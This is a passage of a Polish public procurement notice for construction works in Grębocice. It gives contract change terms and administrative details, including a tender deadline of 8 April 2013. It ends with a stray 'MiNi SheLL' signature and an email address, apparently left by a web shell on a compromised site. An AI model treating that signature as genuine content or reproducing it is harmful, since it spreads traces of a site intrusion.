przewidzianych w niej warunkach. 8) niesprzyjające warunki pogodowe, które mogą spowodować zmianę
terminu realizacji umowy, ale tylko na podstawie pisemnej zgody Zamawiającego 8. Podstawę obliczenia
kosztów zmiany, o której mowa w ust. 6 pkt 3 w przypadku, gdy zmiany będą wynikać ze zmiany
dokumentacji projektowej lub specyfikacji technicznych wykonania odbioru robót stanowi projekt zamienny, o
którym mowa w ust.5 oraz 1) Kosztorys ofertowy w części cen jednostkowych lub dane wyjściowe do
kosztorysowania przyjęte do sporządzenia kosztorysu ofertowego wykonawcy, ceny jednostkowe pracy
sprzętu i materiałów zaproponowane przez wykonawcę, ale nie większe niż średnie ceny SEKOCENBUD dla kwartału poprzedzającego termin wykonania robót budowlanych, lub 2) Kalkulacja szczegółowa w oparciu o
uzgodnione z zamawiającym publikacje jednostkowych nakładów rzeczowych*/ kalkulacja uproszczona
sporządzona w oparciu o uzgodniony z zamawiającym publikator cen jednostkowych robót budowlanych*. 9.
Jednakże wykonawca nie będzie uprawniony do żadnego przedłużenia terminu wykonania umowy i
zwiększenia wynagrodzenia, oraz w zakresie, w jakim konieczność dokonania zmiany została spowodowana  przez jakikolwiek błąd lub opóźnienie ze strony wykonawcy, włącznie z błędem lub opóźnionym dostarczeniem jakiegokolwiek dokumentu wynikającego z obowiązków wykonawcy. 10. Dokonanie zmian, o których mowa w ust. 4 wymaga podpisania aneksu do umowy</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zeas_grebocice.biposwiata.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zespół Ekonomiczno - Administracyjny Szkół i Przedszkola w Grębocicach ul. Szkolna 2/2-3 59-150  Grębocice.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.04.2013 godzina 10:00, miejsce: Zespół Ekonomiczno - Administracyjny Szkół i Przedszkola w Grębocicach ul. Szkolna 2/2-3 59-150  Grębocice sEKRETARIAT.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com